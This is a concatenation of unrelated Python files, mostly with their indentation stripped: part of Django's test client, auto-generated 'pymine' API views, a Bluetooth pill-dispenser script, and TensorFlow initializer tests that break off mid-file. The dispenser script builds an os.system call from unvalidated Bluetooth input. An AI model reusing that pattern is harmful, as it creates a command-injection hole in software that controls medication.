# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
response = self.get_response(request)
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
store.setdefault('context', ContextList()).append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
is_file = lambda thing: hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
item
]])
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
]])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
def encode_file(boundary, key, file):
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
content_type = mimetypes.guess_type(file.name)[0]
if content_type is None:
content_type = 'application/octet-stream'
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"' \
% (key, os.path.basename(file.name))),
to_bytes('Content-Type: %s' % content_type),
b'',
file.read()
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
Once you have a request object you can pass it to any view function,
just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
    def _encode_data(self, data, content_type):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = unquote(path)
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
path = path.encode('utf-8').decode('iso-8859-1')
return path
def get(self, path, data={}, **extra):
"Construct a GET request."
parsed = urlparse(path)
query_string = urlencode(data, doseq=True) or force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('GET'),
}
r.update(extra)
return self.request(**r)
def post(self, path, data={}, content_type=MULTIPART_CONTENT,
**extra):
"Construct a POST request."
post_data = self._encode_data(data, content_type)
parsed = urlparse(path)
query_string = force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'CONTENT_LENGTH': len(post_data),
'CONTENT_TYPE': content_type,
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('POST'),
'wsgi.input': FakePayload(post_data),
}
r.update(extra)
return self.request(**r)
def head(self, path, data={}, **extra):
"Construct a HEAD request."
parsed = urlparse(path)
query_string = urlencode(data, doseq=True) or force_str(parsed[4])
if six.PY3:
query_string = query_string.encode('utf-8').decode('iso-8859-1')
r = {
'PATH_INFO': self._get_path(parsed),
'QUERY_STRING': query_string,
'REQUEST_METHOD': str('HEAD'),
}
r.update(extra)
return self.request(**r)
def options(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type, **extra)
def put(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
**extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type, **extra)
def generic(self, method, path,
data='', content_type='application/octet-stream', **extra):
parsed = urlparse(path)
data = force_bytes(data, settings.DEFAULT_CHARSET)
r = {
'PATH_INFO': self._get_path(parsed),
'REQUEST_METHOD': str(method),
}
if data:
r.update({
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': str(content_type),
'wsgi.input': FakePayload(data),
})
r.update(extra)
# If QUERY_STRING is absent or empty, we want to extract it from the URL.
if not r.get('QUERY_STRING'):
query_string = force_bytes(parsed[4])
# WSGI requires latin-1 encoded strings. See get_path_info().
if six.PY3:
query_string = query_string.decode('iso-8859-1')
r['QUERY_STRING'] = query_string
return self.request(**r)
class Client(RequestFactory):
"""
A class that can act as a client for testing purposes.
It allows the user to compose GET and POST requests, and
obtain the response that the server gave to those requests.
The server Response objects are annotated with the details
of the contexts and templates that were rendered during the
process of serving the request.
Client objects are stateful - they will retain cookie (and
thus session) details for the lifetime of the Client instance.
This is not intended as a replacement for Twill/Selenium or
the like - it is here to allow testing against the
contexts and templates produced by a view, rather than the
HTML rendered to the end-user.
"""
def __init__(self, enforce_csrf_checks=False, **defaults):
super(Client, self).__init__(**defaults)
self.handler = ClientHandler(enforce_csrf_checks)
self.exc_info = None
def store_exc_info(self, **kwargs):
"""
Stores exceptions when they are generated by a view.
"""
self.exc_info = sys.exc_info()
def _session(self):
"""
Obtains the current session variables.
"""
if 'django.contrib.sessions' in settings.INSTALLED_APPS:
engine = import_module(settings.SESSION_ENGINE)
cookie = self.cookies.get(settings.SESSION_COOKIE_NAME, None)
if cookie:
return engine.SessionStore(cookie.value)
return {}
session = property(_session)
def request(self, **request):
"""
The master request method. Composes the environment dictionary
and passes to the handler, returning the result of the handler.
Assumes defaults for the query environment, which can be overridden
using the arguments to the request.
"""
environ = self._base_environ(**request)
# Curry a data dictionary into an instance of the template renderer
# callback function.
data = {}
on_template_render = curry(store_rendered_templates, data)
signals.template_rendered.connect(on_template_render, dispatch_uid="template-render")
# Capture exceptions created by the handler.
got_request_exception.connect(self.store_exc_info, dispatch_uid="request-exception")
try:
try:
response = self.handler(environ)
except TemplateDoesNotExist as e:
# If the view raises an exception, Django will attempt to show
# the 500.html template. If that template is not available,
# we should ignore the error in favor of re-raising the
# underlying exception that caused the 500 error. Any other
# template found to be missing during view error handling
# should be reported as-is.
if e.args != ('500.html',):
raise
# Look for a signalled exception, clear the current context
# exception data, then re-raise the signalled exception.
# Also make sure that the signalled exception is cleared from
# the local cache!
if self.exc_info:
exc_info = self.exc_info
self.exc_info = None
six.reraise(*exc_info)
# Save the client and request that stimulated the response.
response.client = self
response.request = request
# Add any rendered template detail to the response.
response.templates = data.get("templates", [])
response.context = data.get("context")
# Flatten a single context. Not really necessary anymore thanks to
# the __getattr__ flattening in ContextList, but has some edge-case
# backwards-compatibility implications.
if response.context and len(response.context) == 1:
response.context = response.context[0]
# Update persistent cookie data.
if response.cookies:
self.cookies.update(response.cookies)
return response
finally:
signals.template_rendered.disconnect(dispatch_uid="template-render")
got_request_exception.disconnect(dispatch_uid="request-exception")
def get(self, path, data={}, follow=False, **extra):
"""
Requests a response from the server using GET.
"""
response = super(Client, self).get(path, data=data, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def post(self, path, data={}, content_type=MULTIPART_CONTENT,
follow=False, **extra):
"""
Requests a response from the server using POST.
"""
response = super(Client, self).post(path, data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def head(self, path, data={}, follow=False, **extra):
"""
Request a response from the server using HEAD.
"""
response = super(Client, self).head(path, data=data, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def options(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Request a response from the server using OPTIONS.
"""
response = super(Client, self).options(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def put(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a resource to the server using PUT.
"""
response = super(Client, self).put(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def patch(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a resource to the server using PATCH.
"""
response = super(Client, self).patch(
path, data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def delete(self, path, data='', content_type='application/octet-stream',
follow=False, **extra):
"""
Send a DELETE request to the server.
"""
response = super(Client, self).delete(path,
data=data, content_type=content_type, **extra)
if follow:
response = self._handle_redirects(response, **extra)
return response
def login(self, **credentials):
"""
Sets the Factory to appear as if it has successfully logged into a site.
Returns True if login is possible; False if the provided credentials
are incorrect, or the user is inactive, or if the sessions framework is
not available.
"""
user = authenticate(**credentials)
if user and user.is_active \
and 'django.contrib.sessions' in settings.INSTALLED_APPS:
engine = import_module(settings.SESSION_ENGINE)
# Create a fake request to store login details.
request = HttpRequest()
if self.session:
request.session = self.session
else:
request.session = engine.SessionStore()
login(request, user)
# Save the session values.
request.session.save()
# Set the cookie to represent the session.
session_cookie = settings.SESSION_COOKIE_NAME
self.cookies[session_cookie] = request.session.session_key
cookie_data = {
'max-age': None,
'path': '/',
'domain': settings.SESSION_COOKIE_DOMAIN,
'secure': settings.SESSION_COOKIE_SECURE or None,
'expires': None,
}
self.cookies[session_cookie].update(cookie_data)
return True
else:
return False
def logout(self):
"""
Removes the authenticated user's cookies and session object.
Causes the authenticated user to be logged out.
"""
request = HttpRequest()
engine = import_module(settings.SESSION_ENGINE)
UserModel = get_user_model()
if self.session:
request.session = self.session
uid = self.session.get("_auth_user_id")
if uid:
request.user = UserModel._default_manager.get(pk=uid)
else:
request.session = engine.SessionStore()
logout(request)
self.cookies = SimpleCookie()
def _handle_redirects(self, response, **extra):
"Follows any redirects by requesting responses from the server using GET."
response.redirect_chain = []
while response.status_code in (301, 302, 303, 307):
url = response.url
redirect_chain = response.redirect_chain
redirect_chain.append((url, response.status_code))
url = urlsplit(url)
if url.scheme:
extra['wsgi.url_scheme'] = url.scheme
if url.hostname:
extra['SERVER_NAME'] = url.hostname
if url.port:
extra['SERVER_PORT'] = str(url.port)
response = self.get(url.path, QueryDict(url.query), follow=False, **extra)
response.redirect_chain = redirect_chain
# Prevent loops
if response.redirect_chain[-1] in response.redirect_chain[0:-1]:
break
return response
|
|
#!/usr/bin/env python
##
## Copyright 2010 Adriana Lukas & Alec Muffett
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You
## may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
## implied. See the License for the specific language governing
## permissions and limitations under the License.
##
"""docstring goes here""" # :-)
from django.conf import settings
from django.http import HttpResponse
from pymine.api.envelope import Envelope
from pymine.api.models import Comment, Item, Registry
import pymine.util.httpserve as httpserve
##################################################################
# this definition (create_comment) is auto-generated.
# ensure that any changes are made via the generator.
def create_comment(request, idz, **kwargs):
"""
arguments: request, idz, **kwargs
implements: POST /api/comment/item/(IDZ).(FMT)
returns: an envelope containing the comment structure
"""
m = Comment.create(request, commentUponItem=int(idz))
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (create_thing) is auto-generated.
# ensure that any changes are made via the generator.
def create_thing(request, thyng, **kwargs):
"""
arguments: request, thyng, **kwargs
implements: POST /api/feed.(FMT)
implements: POST /api/item.(FMT)
implements: POST /api/tag.(FMT)
implements: POST /api/vurl.(FMT)
returns: an envelope containing the thing structure
"""
m = thyng.create(request)
convert = getattr(m, 'to_structure', None)
    if convert: # it's a single Thing
        s = { m.thing_prefix : convert(request) }
    else: # it's a list of Things, or something that we assume to be sane
s = m
return Envelope(request, result=s)
##################################################################
# this definition (delete_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def delete_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: DELETE /api/registry/(RATTR).(FMT)
returns: an empty envelope
"""
m = Registry.get(key=rattr)
m.delete()
return Envelope(request, result=0)
##################################################################
# this definition (delete_thing) is auto-generated.
# ensure that any changes are made via the generator.
def delete_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: DELETE /api/comment/(ID).(FMT)
implements: DELETE /api/feed/(ID).(FMT)
implements: DELETE /api/item/(ID).(FMT)
implements: DELETE /api/tag/(ID).(FMT)
implements: DELETE /api/vurl/(ID).(FMT)
returns: an empty envelope
"""
m = thyng.get(id=int(id))
m.delete()
return Envelope(request, result=0)
##################################################################
# this definition (delete_thing_attr) is auto-generated.
# ensure that any changes are made via the generator.
def delete_thing_attr(request, thyng, id, attr, **kwargs):
"""
arguments: request, thyng, id, attr, **kwargs
implements: DELETE /api/comment/(ID)/(ATTR).(FMT)
implements: DELETE /api/feed/(ID)/(ATTR).(FMT)
implements: DELETE /api/item/(ID)/(ATTR).(FMT)
implements: DELETE /api/tag/(ID)/(ATTR).(FMT)
implements: DELETE /api/vurl/(ID)/(ATTR).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
m.delete_attribute(attr)
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (encode_minekey) is auto-generated.
# ensure that any changes are made via the generator.
def encode_minekey(request, **kwargs):
"""
arguments: request, **kwargs
implements: POST /api/encode.(FMT)
returns: ...
"""
s = {}
return Envelope(request, result=s)
##################################################################
# this definition (get_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def get_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: GET /api/registry/(RATTR).(FMT)
returns: ...
"""
m = Registry.get(key=rattr)
return Envelope(request, result=m.value)
##################################################################
# this definition (get_thing_attr) is auto-generated.
# ensure that any changes are made via the generator.
def get_thing_attr(request, thyng, id, attr, **kwargs):
"""
arguments: request, thyng, id, attr, **kwargs
implements: GET /api/comment/(ID)/(ATTR).(FMT)
implements: GET /api/feed/(ID)/(ATTR).(FMT)
implements: GET /api/item/(ID)/(ATTR).(FMT)
implements: GET /api/tag/(ID)/(ATTR).(FMT)
implements: GET /api/vurl/(ID)/(ATTR).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
s = m.to_structure(request)
return Envelope(request, result=s[attr]) # throw exception if not there
##################################################################
# this definition (list_comments) is auto-generated.
# ensure that any changes are made via the generator.
def list_comments(request, idz, **kwargs):
"""
arguments: request, idz, **kwargs
implements: GET /api/comment/item/(IDZ).(FMT)
returns: ...
"""
iid = int(idz)
if iid == 0:
qs = Comment.list()
else:
item = Item.get(id=iid)
qs = item.comment_set.filter(is_deleted=False)
if 'query' in request.REQUEST:
qs = Comment.execute_search_query(request.REQUEST['query'], qs)
result = [ { m.thing_prefix : m.to_structure(request) } for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (list_registry) is auto-generated.
# ensure that any changes are made via the generator.
def list_registry(request, **kwargs):
"""
arguments: request, **kwargs
implements: GET /api/registry.(FMT)
returns: ...
"""
qs = Registry.objects.all()
result = [ m.to_structure(request) for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (list_things) is auto-generated.
# ensure that any changes are made via the generator.
def list_things(request, thyng, **kwargs):
"""
arguments: request, thyng, **kwargs
implements: GET /api/feed.(FMT)
implements: GET /api/item.(FMT)
implements: GET /api/tag.(FMT)
implements: GET /api/vurl.(FMT)
returns: ...
"""
qs = thyng.list()
if 'query' in request.REQUEST:
qs = thyng.execute_search_query(request.REQUEST['query'], qs)
result = [ { m.thing_prefix : m.to_structure(request) } for m in qs ]
return Envelope(request, result=result)
##################################################################
# this definition (read_item_data) is auto-generated.
# ensure that any changes are made via the generator.
def read_item_data(request, id, token, **kwargs):
"""
arguments: request, id, token, **kwargs
implements: GET /api/data/(ID)(/TOKEN)
returns: ...
"""
m = Item.get(id=int(id))
ct = m.data_type
if m.data:
f = m.data.chunks()
response = HttpResponse(f, content_type=ct)
response['Content-Length'] = m.data.size
else:
d = m.feed_description()
response = HttpResponse(d)
response['Content-Length'] = len(d)
return response
##################################################################
# this definition (read_item_icon) is auto-generated.
# ensure that any changes are made via the generator.
def read_item_icon(request, id, token, **kwargs):
"""
arguments: request, id, token, **kwargs
implements: GET /api/icon/(ID)(/TOKEN)
returns: ...
"""
return httpserve.httpserve_path(request, 'images/icon.png')
##################################################################
# this definition (read_thing) is auto-generated.
# ensure that any changes are made via the generator.
def read_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: GET /api/comment/(ID).(FMT)
implements: GET /api/feed/(ID).(FMT)
implements: GET /api/item/(ID).(FMT)
implements: GET /api/tag/(ID).(FMT)
implements: GET /api/vurl/(ID).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
# this definition (read_version) is auto-generated.
# ensure that any changes are made via the generator.
def read_version(request, **kwargs):
"""
arguments: request, **kwargs
implements: GET /api/version.(FMT)
returns: ...
"""
vinfo = {
'mineApiVersion': settings.MINE_API_VERSION,
'softwareName': settings.MINE_SW_NAME,
'softwareMajorVersion': settings.MINE_SW_MAJOR_VERSION,
'softwareMinorVersion': settings.MINE_SW_MINOR_VERSION,
'softwareStatus': settings.MINE_SW_STATUS,
}
return Envelope(request, result=dict(version=vinfo))
##################################################################
# this definition (update_registry_attr) is auto-generated.
# ensure that any changes are made via the generator.
def update_registry_attr(request, rattr, **kwargs):
"""
arguments: request, rattr, **kwargs
implements: POST /api/registry/(RATTR).(FMT)
returns: ...
"""
v = request.POST[rattr]
m, created = Registry.objects.get_or_create(key=rattr, defaults={ 'value': v })
if not created: # then it will need updating
m.value = v
        m.save()
return Envelope(request, result=m.to_structure(request))
##################################################################
# this definition (update_thing) is auto-generated.
# ensure that any changes are made via the generator.
def update_thing(request, thyng, id, **kwargs):
"""
arguments: request, thyng, id, **kwargs
implements: POST /api/comment/(ID).(FMT)
implements: POST /api/feed/(ID).(FMT)
implements: POST /api/item/(ID).(FMT)
implements: POST /api/tag/(ID).(FMT)
implements: POST /api/vurl/(ID).(FMT)
returns: ...
"""
m = thyng.get(id=int(id))
m = m.update(request)
return Envelope(request, result={ m.thing_prefix : m.to_structure(request) })
##################################################################
|
|
#!/usr/bin/python
# bluetooth manager
# libraries
from __future__ import absolute_import, print_function, unicode_literals
from optparse import OptionParser, make_option
import os
import sys
import socket
import uuid
import dbus
import dbus.service
import dbus.mainloop.glib
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import mraa
import time
# setup gpio
x = mraa.Gpio(13)
x.dir(mraa.DIR_OUT)
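# readSock reads one line from the socket a byte at a time: '\n' terminates
# the line, and '\r' terminates it after consuming one more byte (assumed to
# be the '\n' of a CRLF pair). The terminator is not returned; an empty
# recv() means the peer closed the connection.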
def readSock(sock):
print("<<<")
buff=""
while True:
c=sock.recv(1)
if not c:
print("NO DATA")
break
if c=='\r':
c=sock.recv(1)
return buff
if c=='\n':
return buff
else:
buff+=c
class Profile(dbus.service.Object):
fd = -1
@dbus.service.method("org.bluez.Profile1",
in_signature="", out_signature="")
def Release(self):
print("Release")
mainloop.quit()
@dbus.service.method("org.bluez.Profile1",
in_signature="", out_signature="")
def Cancel(self):
print("Cancel")
@dbus.service.method("org.bluez.Profile1",
in_signature="oha{sv}", out_signature="")
def NewConnection(self, path, fd, properties):
self.fd = fd.take()
print("NewConnection(%s, %d)" % (path, self.fd))
server_sock = socket.fromfd(self.fd, socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.setblocking(1)
server_sock.settimeout(1)
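        # Command protocol used in the loop below (inferred from the exchanges):
        #   "D\n<HH:MM>\n"  push the current time to the device
        #   "P\n"           ask which of the three pills to release ('0'/'1' x3)
        #   "H\n"           request a heartbeat reading (stored via savedata.py)
        #   "C\n<config>"   push the schedule produced by readconfig.py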
while True:
try:
print("Sending time...")
configdata=time.strftime("%H:%M")
print(configdata+"\n",end="")
server_sock.send("D\n"+configdata+"\n")
time.sleep(0.5)
data = readSock(server_sock)
print("Received: " + data)
time.sleep(1)
print("Requesting pills to release...")
server_sock.send("P\n")
time.sleep(0.1)
s1 = readSock(server_sock)
s2 = readSock(server_sock)
s3 = readSock(server_sock)
print("Received: ")
print(" s1= "+s1)
print(" s2= "+s2)
print(" s3= "+s3)
if s1 == '1':
print("Releasing Pill 1")
os.system(os.getcwd() + "/py-servo/servo.py 1")
if s2 == '1':
print("Releasing Pill 2")
os.system(os.getcwd() + "/py-servo/servo.py 2")
if s3 == '1' :
print("Releasing Pill 3")
os.system(os.getcwd() + "/py-servo/servo.py 3")
time.sleep(1)
print("Requesting heartbeat...")
server_sock.send("H\n")
time.sleep(0.1)
data = readSock(server_sock)
print("Received: " + data)
os.system(os.getcwd() + "/savedata.py '" + data + "'" )
time.sleep(1)
print("Reading config...")
configdata = os.popen(os.getcwd() + "/readconfig.py").read()
# configdata = "13:00\n14:00\n-"
print("{")
print(configdata)
print("}")
print("Sending config...")
server_sock.send("C\n"+configdata)
# server_sock.send("C\n13:00\n14:00\n-")
#server_sock.send("13:00\n")
#server_sock.send("13:00\n")
#server_sock.send("-\n")
time.sleep(0.5)
data = readSock(server_sock)
print("Received: " + data)
time.sleep(1)
except IOError:
print("IOError")
print("Clear buffer: ")
#print(readSock(server_sock))
pass
server_sock.close()
print("all done")
@dbus.service.method("org.bluez.Profile1",
in_signature="o", out_signature="")
def RequestDisconnection(self, path):
print("RequestDisconnection(%s)" % (path))
if (self.fd > 0):
os.close(self.fd)
self.fd = -1
# main loop
if __name__ == '__main__':
print("Waiting for connections...")
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
manager = dbus.Interface(bus.get_object("org.bluez",
"/org/bluez"), "org.bluez.ProfileManager1")
option_list = [
make_option("-C", "--channel", action="store",
type="int", dest="channel",
default=None),
]
parser = OptionParser(option_list=option_list)
(options, args) = parser.parse_args()
options.uuid = "1101"
# options.uuid = "00001101-0000-1000-8000-00805f9b34fb"
options.psm = "3"
options.role = "slave"
options.name = "Edison SPP Loopback"
options.service = "spp char loopback"
options.path = "/foo/bar/profile"
options.auto_connect = True
options.record = ""
profile = Profile(bus, options.path)
mainloop = GObject.MainLoop()
opts = {
"AutoConnect" : options.auto_connect,
}
if (options.name):
opts["Name"] = options.name
if (options.role):
opts["Role"] = options.role
if (options.psm is not None):
opts["PSM"] = dbus.UInt16(options.psm)
if (options.channel is not None):
opts["Channel"] = dbus.UInt16(options.channel)
if (options.record):
opts["ServiceRecord"] = options.record
if (options.service):
opts["Service"] = options.service
if not options.uuid:
options.uuid = str(uuid.uuid4())
manager.RegisterProfile(options.path, options.uuid, opts)
mainloop.run()
|
|
"""Tests for tensorflow.ops.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import init_ops
# Returns True iff the two initializers produce the same tensor to
# within a tiny tolerance.
def identicaltest(tc, init1, init2, use_gpu):
"""Tests if two initializations are identical to within tiny tolerances.
Args:
tc: An instance of TensorFlowTestCase.
init1: An Initializer that generates a tensor of a given shape
init2: An Initializer that generates a tensor of a given shape
use_gpu: Use gpu if true.
Returns:
True or False as determined by test.
"""
num = 100
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
t1 = init1([num]).eval()
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
t2 = init2([num]).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def duplicated_initializer(tc, init, use_gpu, graph_seed):
"""Tests duplicated random initializer within the same graph.
This test generates two random kernels from the same initializer to the same
  graph, and checks if the results are close enough. Even given the same global
  seed, two different instances of random kernels should generate different
  results.
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
use_gpu: Use gpu if true.
graph_seed: A graph-level seed to use.
Returns:
True or False as determined by test.
"""
num = 100
with tc.test_session(use_gpu=use_gpu, graph=tf.Graph()):
random_seed.set_random_seed(graph_seed)
t1 = init([num]).eval()
t2 = init([num]).eval()
return np.allclose(t1, t2, rtol=1e-15, atol=1e-15)
def _init_sampler(tc, init, num, use_gpu):
"""Returns a func to generate a random tensor of shape [num].
Args:
tc: An instance of TensorFlowTestCase.
init: An Initializer that generates a tensor of a given shape
num: Size of 1D tensor to create.
use_gpu: Use gpu if true.
Returns:
Function to generate a random tensor.
"""
def func():
with tc.test_session(use_gpu=use_gpu):
return init([num]).eval()
return func
class RandomNormalInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.random_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.random_normal_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.random_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.random_normal_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu=use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.random_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class TruncatedNormalInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.truncated_normal_initializer(0.0, 1.0, seed=1)
init2 = tf.truncated_normal_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu=use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.truncated_normal_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class RandomUniformInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
init2 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.random_uniform_initializer(0.0, 1.0, seed=1)
init2 = tf.random_uniform_initializer(0.0, 1.0, seed=2)
self.assertFalse(identicaltest(self, init1, init2, use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.random_uniform_initializer(0.0, 1.0)
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class UniformUnitScalingInitializationTest(tf.test.TestCase):
def testInitializerIdentical(self):
for use_gpu in [False, True]:
init1 = tf.uniform_unit_scaling_initializer(seed=1)
init2 = tf.uniform_unit_scaling_initializer(seed=1)
self.assertTrue(identicaltest(self, init1, init2, use_gpu))
init3 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
init4 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
self.assertTrue(identicaltest(self, init3, init4, use_gpu))
def testInitializerDifferent(self):
for use_gpu in [False, True]:
init1 = tf.uniform_unit_scaling_initializer(seed=1)
init2 = tf.uniform_unit_scaling_initializer(seed=2)
init3 = tf.uniform_unit_scaling_initializer(1.5, seed=1)
self.assertFalse(identicaltest(self, init1, init2, use_gpu))
self.assertFalse(identicaltest(self, init1, init3, use_gpu))
self.assertFalse(identicaltest(self, init2, init3, use_gpu))
def testDuplicatedInitializer(self):
for use_gpu in [False, True]:
init = tf.uniform_unit_scaling_initializer()
self.assertFalse(duplicated_initializer(self, init, use_gpu, 1))
class RandomWalkShapeTest(tf.test.TestCase):
